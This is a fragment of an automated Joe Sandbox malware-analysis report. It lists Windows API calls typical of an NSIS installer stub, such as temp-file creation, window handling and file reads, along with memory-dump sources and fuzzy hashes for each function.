                                                                                                                                                                                                                                                                                            control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                            • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                            • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                            • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                            • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
